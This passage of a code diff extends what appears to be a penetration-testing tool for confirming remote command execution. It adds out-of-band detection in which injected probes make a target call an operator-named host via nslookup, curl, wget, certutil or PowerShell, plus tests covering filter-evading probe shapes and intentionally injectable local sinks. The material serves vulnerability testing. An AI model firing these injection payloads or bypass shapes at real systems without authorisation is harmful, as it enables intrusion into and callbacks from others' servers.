+            return Verdict("negative", f"delay term not separable from noise ({summary})")
         return Verdict("needs-review",
-                       f"response time tracks the controlled delay linearly ({summary}); blind timing "
-                       "candidate — pair with --methods reflected for an execution proof")
+                       f"response time tracks the controlled delay with drift modelled out "
+                       f"({summary}); blind timing candidate — pair with --methods reflected "
+                       "for an execution proof")
 
 
 class EvalExpr(DetectionMethod):
@@ -2589,6 +2854,182 @@ class EvalExpr(DetectionMethod):
         return self._confirm_computed(obs, probe, boundary=True)
 
 
+class OobCallback(DetectionMethod):
+    """Out-of-band confirmation for a target that returns nothing at all.
+
+    A fully blind sink -- no command output in the response, no writable web
+    root -- had no path to a ``confirmed`` verdict: ``time`` tops out at
+    ``needs-review`` by design, and ``file`` needs somewhere to write that the
+    target also serves. This closes that gap by making the target reach *out*.
+
+    Each probe carries its own random token and asks the target to resolve or
+    fetch ``<token>.<oob-host>``; RCEKit's own listener (HTTP + DNS, started in
+    process) records what arrives and correlates it back to the payload. A
+    callback carrying a token the target could only have learned by running the
+    command is proof of execution -- the same "the target produced something it
+    could not have echoed" invariant the results-based methods use.
+
+    The DNS probes matter more than the HTTP ones: egress filtering that blocks
+    outbound HTTP usually still lets the resolver out, and a resolver-only path
+    is often the only channel a hardened target has. One probe goes further and
+    exfiltrates a *computed* value in the label -- ``$((a+b)).<token>....`` --
+    so the callback proves the shell evaluated arithmetic, not merely that a
+    hostname was resolved.
+
+    Requires ``--oob-host``: an address the *target* can reach that resolves (or
+    is delegated) to this listener. It makes the target open outbound
+    connections, so it never runs unless the operator names that host."""
+    name = "oob"
+    tier = "confirmed"
+    # The callbacks are asynchronous -- one can land well after the response
+    # that triggered it -- so no probe can be judged until the whole batch has
+    # been fired and the listener has been given time to collect.
+    aggregate = True
+
+    # token -> which probe shape produced it, and the value a computed-label
+    # probe asked the target to evaluate. Reporting detail only.
+    _shape: Dict[str, str] = {}
+    _computed: Optional[int] = None
+
+    def applicable(self, record: "PayloadRecord") -> bool:
+        if not self.config.get("oob_host"):
+            return False
+        return record.environment in SHELL_CAPABLE_ENVIRONMENTS
+
+    def _token(self, rng: "random.Random") -> str:
+        # Lowercase letters and digits only: a DNS label is case-insensitive and
+        # the listener correlates case-folded, so a mixed-case token would only
+        # invite a 0x20-encoding resolver to mangle the comparison.
+        return "rk" + "".join(rng.choice(string.ascii_lowercase + string.digits)
+                              for _ in range(10))
+
+    def build_probes(self, record: "PayloadRecord", rng: "random.Random") -> List[Probe]:
+        host = str(self.config["oob_host"]).strip().rstrip(".")
+        http_port = int(self.config.get("oob_http_port") or 80)
+        windows = record.environment == "windows"
+        port_suffix = "" if http_port == 80 else f":{http_port}"
+        # A bare IP cannot carry a token as a DNS label -- there is nothing to
+        # delegate and `<token>.10.0.0.1` resolves nowhere -- so the token rides
+        # in the URL path instead, and the DNS shapes are skipped rather than
+        # sent as probes that could never call back.
+        ip_host = self._is_ip_literal(host)
+        probes: List[Probe] = []
+        # Per-instance, so probes built for one carrier do not inherit another's
+        # bookkeeping through the class attribute.
+        self._shape = dict(self._shape)
+
+        listener = self.config.get("oob_listener")
+
+        separators = (self._separators(windows) if self._needs_separator(record) else (None,))
+
+        def add(core_for_token, label: str):
+            # A token per *separator*, not per shape. Sharing one token across
+            # break-outs would mark every separator confirmed as soon as any one
+            # of them called back -- and `cmd || curl` never runs when cmd
+            # succeeds, so the report would name payloads that did nothing.
+            for separator in separators:
+                token = self._token(rng)
+                core = core_for_token(token)
+                body = core if separator is None else f"{separator}{core}"
+                payload = self._wrap_context(record, body)
+                probes.append(Probe(payload=payload, expected=token, separator=separator))
+                self._shape[token] = label
+                # Register the token with the listener, which correlates an
+                # incoming callback by looking for a known token in the requested
+                # host/path. Without this the hit arrives unattributable.
+                if listener is not None:
+                    listener.tokens[token] = {
+                        "payload": payload, "category": "detection",
+                        "context": record.context,
+                    }
+
+        def url_for(token: str) -> str:
+            authority = host if ip_host else f"{token}.{host}"
+            return f"http://{authority}{port_suffix}/{token}"
+
+        if windows:
+            if not ip_host:
+                add(lambda t: f"nslookup {t}.{host}", "dns/nslookup")
+            add(lambda t: f"certutil -urlcache -f {url_for(t)} %TEMP%\\{t}", "http/certutil")
+            add(lambda t: f"powershell -c \"iwr -useb {url_for(t)}\"", "http/powershell")
+        else:
+            if not ip_host:
+                # DNS first: the resolver is the channel most likely to be open
+                # when outbound HTTP is not.
+                add(lambda t: f"nslookup {t}.{host}", "dns/nslookup")
+                add(lambda t: f"host {t}.{host}", "dns/host")
+                if self._depth() != "quick":
+                    add(lambda t: f"ping -c 1 {t}.{host}", "dns/ping")
+                    # Computed value in the label: the callback then proves the
+                    # shell evaluated arithmetic, not merely that something
+                    # resolved a name it was handed.
+                    a, b = rng.randint(1000, 9999), rng.randint(1000, 9999)
+                    self._computed = a + b
+                    add(lambda t: f"nslookup $(({a}+{b})).{t}.{host}", "dns/computed")
+            add(lambda t: f"curl -s {url_for(t)}", "http/curl")
+            if self._depth() != "quick":
+                add(lambda t: f"wget -q -O- {url_for(t)}", "http/wget")
+        return probes
+
+    @staticmethod
+    def _is_ip_literal(host: str) -> bool:
+        """Whether ``host`` is an address literal rather than a name. Only a
+        name can carry a per-probe token as a DNS label."""
+        if host.startswith("[") or ":" in host:
+            return True  # IPv6 literal
+        octets = host.split(".")
+        return (len(octets) == 4
+                and all(o.isascii() and o.isdigit() and int(o) < 256 for o in octets))
+
+    def confirm_each(self, series: "List[Tuple[Probe, Observation]]"
+                     ) -> "Optional[List[Tuple[Probe, Verdict]]]":
+        """Wait for callbacks, then judge each probe by whether its own token
+        arrived. Per-probe rather than one series verdict, so the report names
+        the payload that actually reached the listener."""
+        import time
+        listener = self.config.get("oob_listener")
+        wait = float(self.config.get("oob_wait", 6.0))
+        out: List[Tuple[Probe, Verdict]] = []
+        if listener is None:
+            return [(probe, Verdict("error", "no OOB listener was started"))
+                    for probe, _ in series]
+        deadline = time.time() + wait
+        wanted = {probe.expected for probe, _ in series}
+        while time.time() < deadline:
+            if wanted <= {hit.get("token") for hit in listener.hits}:
+                break
+            time.sleep(0.25)
+        received = {}
+        for hit in listener.hits:
+            received.setdefault(hit.get("token"), hit)
+        for probe, obs in series:
+            hit = received.get(probe.expected)
+            if hit:
+                shape = self._shape.get(probe.expected, "callback")
+                detail = (f"target called back to the listener over {hit.get('proto')} "
+                          f"carrying token {probe.expected!r} ({shape}) — execution proven "
+                          "out of band")
+                computed = getattr(self, "_computed", None)
+                if computed is not None and str(computed) in (hit.get("host") or ""):
+                    detail += f"; the callback label carries the computed value {computed}"
+                out.append((probe, Verdict("confirmed", detail)))
+            elif obs.status is None:
+                out.append((probe, Verdict("error",
+                                           f"request never reached the target ({obs.body[:120]})")))
+            else:
+                out.append((probe, Verdict("negative", "no callback for this probe's token")))
+        return out
+
+    def confirm_series(self, series: "List[Tuple[Probe, Observation]]") -> Verdict:
+        # confirm_each carries the real logic; this only runs if an engine calls
+        # the series form, and must agree with it.
+        each = self.confirm_each(series) or []
+        confirmed = [v for _, v in each if v.status == "confirmed"]
+        if confirmed:
+            return confirmed[0]
+        return Verdict("negative", "no out-of-band callback received for any probe")
+
+
 # The detection methods RCEKit can run, keyed by their --methods name. Adding a
 # phase = adding a class above and an entry here.
 DETECTION_METHODS = {
@@ -2596,6 +3037,7 @@ DETECTION_METHODS = {
     FileBased.name: FileBased,
     ParametricTime.name: ParametricTime,
     EvalExpr.name: EvalExpr,
+    OobCallback.name: OobCallback,
 }
 
 
@@ -2979,12 +3421,27 @@ def main():
                              "write a newline as \\n. Narrow it (e.g. --separators '; ') to cut the "
                              "request count when the sink's shape is already known. Ignored with "
                              "--sink-raw, which sends bare commands.")
+    parser.add_argument("--probe-depth", choices=["quick", "full"], default="full",
+                        help="(--methods) How many probe shapes to try per sink. 'full' (default) also "
+                             "sends the substitution-free (awk / bare expr) and comment-terminated "
+                             "variants, which reach sinks that strip '$(' and backticks, filter command "
+                             "words, or append a redirect after the injection point — roughly twice the "
+                             "requests. 'quick' sends only the canonical probes, for rate-limited targets "
+                             "or when the sink's shape is already known.")
+    parser.add_argument("--oob-host", default=None,
+                        help="(--methods oob) Host the TARGET should call back to, e.g. an IP it can "
+                             "reach or a domain delegated to this listener. Required for --methods oob, "
+                             "which starts the built-in HTTP+DNS listener and confirms execution from "
+                             "the callback. Makes the target open outbound connections, so it never runs "
+                             "unless you name the host.")
     parser.add_argument("--methods", default=None,
                         help="Comma-separated RCE detection methods to run against --verify-url/-r instead of "
                              "the classic per-payload oracle. Available: reflected (results-based execution "
                              "proof via computed arithmetic); eval (SSTI/SpEL/OGNL/Groovy/raw-eval via a "
                              "computed product); file (self-OOB write+fetch, needs --webroot and "
-                             "--web-base-url); time (hardened blind-timing regression, needs-review only). "
+                             "--web-base-url); oob (DNS/HTTP callback to the built-in listener, needs "
+                             "--oob-host — the only confirmed-tier method for a fully blind sink); "
+                             "time (hardened blind-timing regression, needs-review only). "
                              "Opt-in and additive: when omitted, verification keeps its existing behaviour "
                              "unchanged.")
     parser.add_argument("--verify-chain", default=None,
@@ -3325,7 +3782,29 @@ def main():
                 return 1
             detection_config = {"webroot": args.webroot, "web_base_url": args.web_base_url,
                                 "time_base": args.time_base, "evade": args.evade,
-                                "sink_raw": sink_raw, "separators": separators}
+                                "sink_raw": sink_raw, "separators": separators,
+                                "probe_depth": args.probe_depth,
+                                "contexts_explicit": bool(selected_contexts),
+                                "oob_host": args.oob_host,
+                                "oob_http_port": args.listen_http_port}
+            if OobCallback.name in method_names:
+                if not args.oob_host:
+                    print("[!] --methods oob makes the TARGET call back to a listener, so it needs "
+                          "--oob-host: an address the target can reach that arrives here (an IP on "
+                          "a routable interface, or a domain delegated to this host).")
+                    return 1
+                listener = OOBListener(answer_ip=args.listen_answer_ip, log_path=args.listen_log)
+                try:
+                    listener.start_http(args.listen_http_port)
+                except OSError as exc:
+                    print(f"[!] OOB listener could not bind HTTP port {args.listen_http_port}: {exc}")
+                    return 1
+                dns_up = listener.start_dns(args.listen_dns_port)
+                detection_config["oob_listener"] = listener
+                print(f"[detect] OOB listener up on HTTP :{args.listen_http_port}"
+                      f"{f', DNS :{args.listen_dns_port}' if dns_up else ' (DNS port unavailable)'}; "
+                      f"probes call back to {args.oob_host}. The target will open outbound "
+                      "connections.")
             if "file" in method_names:
                 if not (args.webroot and args.web_base_url):
                     print("[!] --methods file writes a file to the target and fetches it back, so it "

--- a/tests/test_generator.py
+++ b/tests/test_generator.py
@@ -30,6 +30,7 @@ from rcekit import (  # noqa: E402
     Probe,
     RCEKit,
     ReflectedMath,
+    Verdict,
     build_request_inputs,
     parse_raw_request,
     partition_destructive,
@@ -2074,29 +2075,75 @@ class ParametricTimeTestCase(unittest.TestCase):
         self.method = ParametricTime(self.gen, {"time_base": 2.0, "time_repeats": 2})
 
     def _series(self, mapping):
-        series = []
-        for delay, elapseds in mapping.items():
-            for elapsed in elapseds:
-                series.append((Probe(payload="x", expected="", delay_s=delay),
-                               Observation(status=200, body="", elapsed=elapsed)))
-        return series
+        """A regression-phase series. Only ``regress`` probes are judged — the
+        screen round exists to pick a separator, not to decide anything — and
+        the samples are interleaved rather than grouped by delay so the request
+        index does not stand in for the injected delay."""
+        samples = [(delay, elapsed) for delay, elapseds in mapping.items()
+                   for elapsed in elapseds]
+        samples.sort(key=lambda pair: (pair[1] * 7919) % 13)
+        return [(Probe(payload="x", expected="", delay_s=delay, phase="regress"),
+                 Observation(status=200, body="", elapsed=elapsed))
+                for delay, elapsed in samples]
 
     def test_tier_is_needs_review_and_method_is_aggregate(self):
         self.assertEqual(self.method.tier, "needs-review")
         self.assertTrue(self.method.aggregate)
 
-    def test_build_probes_cover_zero_n_and_two_n(self):
+    def test_screen_probes_cover_zero_and_n_per_separator(self):
+        # Round one only screens: one 0s and one Ns probe per candidate
+        # separator, so the expensive regression is never run through a
+        # break-out that did not reach a shell.
         import random as _random
         probes = self.method.build_probes(make_record(environment="unix", context="raw"),
                                           _random.Random(1))
-        delays = sorted({p.delay_s for p in probes})
-        self.assertEqual(delays, [0.0, 2.0, 4.0])
+        self.assertTrue(all(p.phase == "screen" for p in probes))
+        self.assertEqual(sorted({p.delay_s for p in probes}), [0.0, 2.0])
         self.assertTrue(all("sleep" in p.payload for p in probes))
+
+    def test_regression_probes_cover_zero_n_and_two_n(self):
+        import random as _random
+        record = make_record(environment="unix", context="raw")
+        screen = self.method.build_probes(record, _random.Random(1))
+        # A separator that delayed by the injected amount unlocks round two.
+        series = [(p, Observation(status=200, body="", elapsed=(p.delay_s or 0.0) + 0.1))
+                  for p in screen]
+        regression = self.method.next_probes(series)
+        self.assertTrue(regression)
+        self.assertTrue(all(p.phase == "regress" for p in regression))
+        self.assertEqual(sorted({p.delay_s for p in regression}), [0.0, 2.0, 4.0])
+        # ...all through one separator: a regression blends its probes into a
+        # single measurement, so mixing break-outs would destroy the signal.
+        self.assertEqual(len({p.separator for p in regression}), 1)
+
+    def test_no_separator_delays_means_no_regression_is_run(self):
+        import random as _random
+        record = make_record(environment="unix", context="raw")
+        screen = self.method.build_probes(record, _random.Random(1))
+        flat = [(p, Observation(status=200, body="", elapsed=0.1)) for p in screen]
+        self.assertEqual(self.method.next_probes(flat), [])
+        verdict = self.method.confirm_series(flat)
+        self.assertEqual(verdict.status, "negative")
+        self.assertIn("no command separator produced a delay", verdict.evidence)
 
     def test_confirm_series_linear_response_is_needs_review(self):
         verdict = self.method.confirm_series(
             self._series({0: [0.10, 0.12], 2.0: [2.11, 2.09], 4.0: [4.12, 4.08]}))
         self.assertEqual(verdict.status, "needs-review")
+
+    def test_latency_drift_is_not_mistaken_for_a_sleep(self):
+        # A target that simply gets slower during the run -- progressive load, a
+        # rate limiter backing off -- used to produce a textbook-perfect linear
+        # fit while being entirely un-injectable, because the probes were fired
+        # in ascending delay order and the delay was collinear with the request
+        # index. Here every response time comes from the request order alone.
+        series = []
+        for i, delay in enumerate([2.0, 0.0, 4.0, 4.0, 0.0, 2.0, 0.0, 2.0, 4.0]):
+            series.append((Probe(payload="x", expected="", delay_s=delay, phase="regress"),
+                           Observation(status=200, body="", elapsed=1.0 * (i + 1))))
+        verdict = self.method.confirm_series(series)
+        self.assertEqual(verdict.status, "negative")
+        self.assertIn("drift", verdict.evidence)
 
     def test_confirm_series_rejects_flat_jitter_and_nonmonotonic(self):
         flat = self.method.confirm_series(
@@ -2699,8 +2746,13 @@ class SeparatorSweepTestCase(unittest.TestCase):
         self.assertTrue(all(p.startswith("| ") for p in payloads), payloads)
 
     def test_sink_raw_still_sends_bare_commands(self):
+        # With --sink-raw the input IS the whole command, so no probe may carry
+        # a leading separator -- whichever command shape it uses.
         payloads = self._payloads({"sink_raw": True})
-        self.assertTrue(all(p.startswith("echo ") for p in payloads), payloads)
+        self.assertTrue(payloads)
+        for payload in payloads:
+            with self.subTest(payload=payload):
+                self.assertRegex(payload, r"^(echo|awk|expr) ")
 
     def test_file_probes_get_a_distinct_target_file_per_separator(self):
         # Sharing one filename would make every probe's followup succeed as soon
@@ -2718,14 +2770,26 @@ class SeparatorSweepTestCase(unittest.TestCase):
         for probe in probes:
             self.assertIn(probe.followup["path"].rsplit("/", 1)[-1], probe.followup["cleanup"])
 
-    def test_aggregate_timing_keeps_a_single_separator(self):
-        # ParametricTime reads a whole probe series as one measurement, so
-        # mixing separators through it would blend a working break-out with
-        # broken ones and destroy the regression.
+    def test_aggregate_timing_screens_every_separator_then_commits_to_one(self):
+        # ParametricTime reads a probe series as one measurement, so it cannot
+        # mix separators through the regression. It screens them instead: one
+        # cheap probe each, then the full regression through whichever one
+        # actually delayed. Locking it to ';' alone reported a blind sink that
+        # merely filters ';' as negative, while '| sleep 3' delayed on it.
         import random as _random
-        probes = ParametricTime(self.gen, {"time_base": 1.0}).build_probes(
-            self.rec, _random.Random(1))
-        self.assertTrue(all(p.payload.startswith("; ") for p in probes), probes)
+        method = ParametricTime(self.gen, {"time_base": 1.0})
+        screen = method.build_probes(self.rec, _random.Random(1))
+        for separator in ("; ", "| ", "|| ", "&& ", "\n"):
+            with self.subTest(separator=separator):
+                self.assertTrue(any(p.payload.startswith(separator) for p in screen))
+        # Only the pipe breaks out on this imaginary sink.
+        series = [(p, Observation(status=200, body="",
+                                  elapsed=(p.delay_s or 0.0) + 0.05 if p.separator == "| "
+                                  else 0.05))
+                  for p in screen]
+        regression = method.next_probes(series)
+        self.assertTrue(regression)
+        self.assertEqual({p.separator for p in regression}, {"| "})
 
     def test_a_pipe_only_sink_is_now_confirmed(self):
         # End-to-end against a real sink that strips ';' and '&': exploitable
@@ -2897,6 +2961,364 @@ class NoProbesBuiltTestCase(unittest.TestCase):
         self.assertEqual(result.returncode, 0, result.stdout)
         self.assertNotIn("NOTHING WAS TESTED", result.stdout)
         self.assertIn("NEVER REACHED THE TARGET", result.stdout)
+
+
+class ProbeDepthTestCase(unittest.TestCase):
+    """The canonical probes route their arithmetic through a command
+    substitution and spell the command `echo`/`expr`. That is two blind spots,
+    and both are filters seen in the wild: a sink that strips `$(` blocks
+    `$((` (a prefix of it) and the backtick too, and a keyword filter on
+    `echo`/`expr` blocks both. The extended shapes exist to reach those."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+        self.rec = make_record(environment="unix", context="raw")
+
+    def _payloads(self, depth):
+        import random as _random
+        method = ReflectedMath(self.gen, {"probe_depth": depth})
+        return [p.payload for p in method.build_probes(self.rec, _random.Random(1))]
+
+    def test_full_depth_adds_substitution_free_shapes(self):
+        payloads = self._payloads("full")
+        substitution_free = [p for p in payloads if "$(" not in p and "`" not in p]
+        self.assertTrue(substitution_free,
+                        "a sink stripping '$(' and backticks would block every probe")
+        self.assertTrue(any("awk " in p for p in substitution_free))
+        self.assertTrue(any(re.search(r"expr \d+ \+ \d+", p) for p in substitution_free))
+
+    def test_full_depth_adds_a_shape_free_of_the_usual_keywords(self):
+        # A WAF blocking the usual command words must still meet a live probe,
+        # so at least one shape must invoke none of them. Compare the command
+        # word itself, not the whole payload: the random tags are letters and
+        # could contain any short sequence by chance.
+        blocked = {"echo", "expr", "cat", "id", "whoami", "sleep"}
+        commands = set()
+        for payload in self._payloads("full"):
+            commands.update(re.findall(r"(?:^|[;|&\n]\s*)([a-z]+)\b", payload))
+        self.assertTrue(commands - blocked, commands)
+
+    def test_full_depth_adds_comment_terminated_shapes(self):
+        payloads = self._payloads("full")
+        self.assertTrue(any(p.rstrip().endswith("#") for p in payloads))
+
+    def test_quick_depth_sends_only_the_canonical_shapes(self):
+        quick, full = self._payloads("quick"), self._payloads("full")
+        self.assertLess(len(quick), len(full))
+        self.assertFalse([p for p in quick if "awk " in p or p.rstrip().endswith("#")])
+
+    def test_quick_is_the_subset_full_extends(self):
+        # 'quick' must not be a different probe set, only a smaller one --
+        # otherwise a target that confirms under one could miss under the other.
+        self.assertTrue(set(self._payloads("quick")) <= set(self._payloads("full")))
+
+    def test_default_depth_is_full(self):
+        import random as _random
+        default = [p.payload for p in
+                   ReflectedMath(self.gen, {}).build_probes(self.rec, _random.Random(1))]
+        self.assertEqual(sorted(default), sorted(self._payloads("full")))
+
+    def test_every_probe_still_carries_an_unforgeable_expected_value(self):
+        # The whole tier rests on this: the expected value must never be a
+        # literal the payload already spells out, or reflection could fake it.
+        import random as _random
+        probes = ReflectedMath(self.gen, {}).build_probes(self.rec, _random.Random(3))
+        for probe in probes:
+            with self.subTest(payload=probe.payload):
+                self.assertNotIn(probe.expected, probe.payload)
+
+    def test_comment_termination_is_skipped_where_it_would_misfire(self):
+        # cmd.exe has no '#' comment, and a context that closes with its own
+        # suffix would have the suffix commented out instead of the sink's tail.
+        import random as _random
+        method = ReflectedMath(self.gen, {})
+        windows = method._wrap_variants(make_record(environment="windows", context="raw"),
+                                        "echo x", windows=True, terminate=True)
+        self.assertEqual(windows, [])
+        quoted = method._wrap_variants(make_record(environment="unix", context="attribute"),
+                                       "echo x", terminate=True)
+        self.assertEqual(quoted, [])
+
+    def test_a_substitution_blocking_sink_is_confirmed(self):
+        import os
+
+        def route(method, path, params, headers, body):
+            query = params.get("q", "")
+            if "$(" in query or "`" in query:
+                return 200, "BLOCKED"
+            pipe = os.popen("echo probing " + query + " 2>/dev/null")
+            out = pipe.read()
+            pipe.close()
+            return 200, out
+
+        with local_target(route) as base:
+            results = self.gen.run_detection(
+                [self.rec], url=f"{base}/x?q=FUZZ", methods=["reflected"])
+        self.assertTrue([r for r in results if r["verdict"] == "confirmed"],
+                        "a sink that only strips substitutions is still exploitable")
+
+    def test_a_sink_that_appends_a_redirect_is_confirmed(self):
+        # `<cmd> <input> | grep <something>` swallows the probe's output
+        # entirely, so the probe executes and reads as negative unless it
+        # comments the tail out.
+        import os
+
+        def route(method, path, params, headers, body):
+            pipe = os.popen("echo probing " + params.get("q", "") + " | grep -c NOTHINGHERE")
+            out = pipe.read()
+            pipe.close()
+            return 200, out
+
+        with local_target(route) as base:
+            results = self.gen.run_detection(
+                [self.rec], url=f"{base}/x?q=FUZZ", methods=["reflected"])
+        self.assertTrue([r for r in results if r["verdict"] == "confirmed"])
+
+    def test_the_extra_shapes_do_not_cost_precision(self):
+        # More probe shapes means more chances to be wrong; re-prove that an
+        # inert reflecting sink stays negative.
+        def route(method, path, params, headers, body):
+            return 200, f"<div>you searched for: {params.get('q', '')}</div>"
+
+        with local_target(route) as base:
+            results = self.gen.run_detection(
+                [self.rec], url=f"{base}/x?q=FUZZ", methods=["reflected", "eval"])
+        self.assertTrue(results)
+        self.assertFalse([r for r in results if r["verdict"] == "confirmed"])
+
+
+class QuotedShellCarrierTestCase(unittest.TestCase):
+    """`shell_single_quoted`/`shell_double_quoted` fit a `ping '<input>'` sink —
+    input interpolated inside quotes, which no probe built for an unquoted
+    context escapes. The generator has always had them, but they are absent from
+    `default_contexts`, so no record carried them and the detection engine never
+    tried them: the one sink shape they exist for was the one that could not be
+    detected at all."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+
+    def _carriers(self, config):
+        base = [make_record(environment="unix", context="raw")]
+        seen = {("unix", "raw")}
+        return [r.context for r in RCEKit._quoted_shell_carriers(base, seen, config)]
+
+    def test_quoted_contexts_are_added_by_default(self):
+        self.assertEqual(sorted(self._carriers({})),
+                         ["shell_double_quoted", "shell_single_quoted"])
+
+    def test_an_explicit_contexts_selection_is_respected(self):
+        # Narrowing the run is a deliberate choice about what to send; widening
+        # it behind the operator's back is not this function's call.
+        self.assertEqual(self._carriers({"contexts_explicit": True}), [])
+
+    def test_non_shell_environments_are_left_alone(self):
+        base = [make_record(environment="mongodb", context="raw")]
+        self.assertEqual(RCEKit._quoted_shell_carriers(base, {("mongodb", "raw")}, {}), [])
+
+    def test_already_present_contexts_are_not_duplicated(self):
+        base = [make_record(environment="unix", context="shell_single_quoted")]
+        seen = {("unix", "shell_single_quoted")}
+        self.assertEqual([r.context for r in RCEKit._quoted_shell_carriers(base, seen, {})],
+                         ["shell_double_quoted"])
+
+    def test_a_single_quoted_sink_is_confirmed_without_naming_the_context(self):
+        import os
+
+        def route(method, path, params, headers, body):
+            pipe = os.popen("echo probing '" + params.get("q", "") + "' 2>/dev/null")
+            out = pipe.read()
+            pipe.close()
+            return 200, out
+
+        record = make_record(environment="unix", context="raw")
+        with local_target(route) as base:
+            results = self.gen.run_detection(
+                [record], url=f"{base}/x?q=FUZZ", methods=["reflected"])
+        confirmed = [r for r in results if r["verdict"] == "confirmed"]
+        self.assertTrue(confirmed, "a quoted sink must be reachable without --contexts")
+        self.assertTrue(any(r["context"] == "shell_single_quoted" for r in confirmed))
+
+
+class OobCallbackTestCase(unittest.TestCase):
+    """Out-of-band detection. A fully blind sink -- nothing in the response, no
+    writable web root -- had no path to a `confirmed` verdict at all."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+        self.rec = make_record(environment="unix", context="raw")
+
+    def _probes(self, config):
+        import random as _random
+        method = rcekit.OobCallback(self.gen, config)
+        return method, method.build_probes(self.rec, _random.Random(1))
+
+    def test_it_does_not_run_without_an_oob_host(self):
+        # It makes the target open outbound connections, so it stays off until
+        # the operator names the host.
+        self.assertFalse(rcekit.OobCallback(self.gen, {}).applicable(self.rec))
+        self.assertTrue(
+            rcekit.OobCallback(self.gen, {"oob_host": "x.example"}).applicable(self.rec))
+
+    def test_each_separator_gets_its_own_token(self):
+        # Sharing one token would mark every separator confirmed as soon as any
+        # one called back -- and `cmd || curl` never runs when cmd succeeds, so
+        # the report would name payloads that did nothing.
+        _, probes = self._probes({"oob_host": "x.example"})
+        tokens = [p.expected for p in probes]
+        self.assertEqual(len(tokens), len(set(tokens)))
+        for probe in probes:
+            with self.subTest(payload=probe.payload):
+                self.assertIn(probe.expected, probe.payload)
+
+    def test_a_named_host_gets_dns_shapes(self):
+        _, probes = self._probes({"oob_host": "x.example"})
+        self.assertTrue(any("nslookup" in p.payload for p in probes))
+        self.assertTrue(any(f"{p.expected}.x.example" in p.payload for p in probes))
+
+    def test_a_computed_value_rides_in_one_dns_label(self):
+        # The callback then proves the shell evaluated arithmetic, not merely
+        # that something resolved a name it was handed.
+        method, probes = self._probes({"oob_host": "x.example"})
+        computed = [p for p in probes if "$((" in p.payload]
+        self.assertTrue(computed)
+        self.assertIsNotNone(method._computed)
+
+    def test_an_ip_host_puts_the_token_in_the_path_and_drops_dns(self):
+        # `<token>.10.0.0.1` resolves nowhere, so those probes could never call
+        # back; the token rides in the URL path instead.
+        _, probes = self._probes({"oob_host": "10.0.0.1"})
+        self.assertTrue(probes)
+        self.assertFalse([p for p in probes if "nslookup" in p.payload or "host " in p.payload])
+        for probe in probes:
+            with self.subTest(payload=probe.payload):
+                self.assertIn(f"/{probe.expected}", probe.payload)
+                self.assertNotIn(f"{probe.expected}.10.0.0.1", probe.payload)
+
+    def test_ip_literal_detection(self):
+        for host in ("10.0.0.1", "127.0.0.1", "::1", "[fe80::1]"):
+            self.assertTrue(rcekit.OobCallback._is_ip_literal(host), host)
+        for host in ("x.example", "a.b.c.d", "999.1.1.1", "target.local"):
+            self.assertFalse(rcekit.OobCallback._is_ip_literal(host), host)
+
+    def test_a_probe_whose_token_came_back_is_confirmed_and_others_are_not(self):
+        listener = OOBListener()
+        method = rcekit.OobCallback(self.gen, {"oob_host": "x.example",
+                                               "oob_listener": listener, "oob_wait": 0.1})
+        import random as _random
+        probes = method.build_probes(self.rec, _random.Random(1))
+        arrived = probes[0]
+        listener.record("dns", "10.0.0.9", f"{arrived.expected}.x.example")
+        series = [(p, Observation(status=200, body="ok")) for p in probes]
+        verdicts = dict((p.payload, v.status) for p, v in method.confirm_each(series))
+        self.assertEqual(verdicts[arrived.payload], "confirmed")
+        self.assertEqual({v for payload, v in verdicts.items() if payload != arrived.payload},
+                         {"negative"})
+
+    def test_a_delivery_failure_is_an_error_not_a_negative(self):
+        listener = OOBListener()
+        method = rcekit.OobCallback(self.gen, {"oob_host": "x.example",
+                                               "oob_listener": listener, "oob_wait": 0.1})
+        import random as _random
+        probes = method.build_probes(self.rec, _random.Random(1))[:1]
+        series = [(probes[0], Observation(status=None, body="connection refused"))]
+        self.assertEqual(method.confirm_each(series)[0][1].status, "error")
+
+    def test_without_a_listener_nothing_is_reported_as_negative(self):
+        # A missing listener means we could not have seen a callback; calling
+        # that 'not vulnerable' is exactly the lie the error tier exists for.
+        method = rcekit.OobCallback(self.gen, {"oob_host": "x.example"})
+        import random as _random
+        probes = method.build_probes(self.rec, _random.Random(1))[:1]
+        series = [(probes[0], Observation(status=200, body="ok"))]
+        self.assertEqual(method.confirm_each(series)[0][1].status, "error")
+
+    def test_end_to_end_a_blind_sink_is_confirmed_via_the_callback(self):
+        import os
+        listener = OOBListener()
+        port = listener.start_http(0).server_address[1]
+
+        def route(method, path, params, headers, body):
+            # Blind: runs the command, returns nothing about it.
+            pipe = os.popen("echo probing " + params.get("q", "") + " >/dev/null 2>&1")
+            pipe.read()
+            pipe.close()
+            return 200, "queued"
+
+        try:
+            with local_target(route) as base:
+                results = self.gen.run_detection(
+                    [self.rec], url=f"{base}/x?q=FUZZ", methods=["oob"],
+                    config={"oob_host": "127.0.0.1", "oob_http_port": port,
+                            "oob_listener": listener, "oob_wait": 3.0})
+        finally:
+            listener._servers[0].shutdown()
+        confirmed = [r for r in results if r["verdict"] == "confirmed"]
+        if not confirmed:
+            self.skipTest("no HTTP fetch tool (curl/wget) available in this environment")
+        self.assertTrue(all(r["tier"] == "confirmed" for r in confirmed))
+
+    def test_a_non_executing_sink_produces_no_callback(self):
+        listener = OOBListener()
+        port = listener.start_http(0).server_address[1]
+
+        def route(method, path, params, headers, body):
+            return 200, f"you searched for: {params.get('q', '')}"
+
+        try:
+            with local_target(route) as base:
+                results = self.gen.run_detection(
+                    [self.rec], url=f"{base}/x?q=FUZZ", methods=["oob"],
+                    config={"oob_host": "127.0.0.1", "oob_http_port": port,
+                            "oob_listener": listener, "oob_wait": 1.0})
+        finally:
+            listener._servers[0].shutdown()
+        self.assertTrue(results)
+        self.assertFalse([r for r in results if r["verdict"] == "confirmed"])
+
+
+class ProbeRoundsTestCase(unittest.TestCase):
+    """An aggregate method may answer with a further probe batch once it has
+    seen the first — screening cheaply before paying for an expensive
+    measurement. The engine bounds the rounds so a method cannot drive it
+    forever against a live target."""
+
+    def test_rounds_are_bounded(self):
+        self.assertGreaterEqual(RCEKit.MAX_PROBE_ROUNDS, 2)
+
+        class Endless(rcekit.DetectionMethod):
+            name = "endless"
+            aggregate = True
+            rounds = 0
+
+            def applicable(self, record):
+                return True
+
+            def build_probes(self, record, rng):
+                return [Probe(payload="x", expected="")]
+
+            def next_probes(self, series):
+                Endless.rounds += 1
+                return [Probe(payload=f"x{Endless.rounds}", expected="")]
+
+            def confirm_series(self, series):
+                return Verdict("negative", f"{len(series)} probes fired")
+
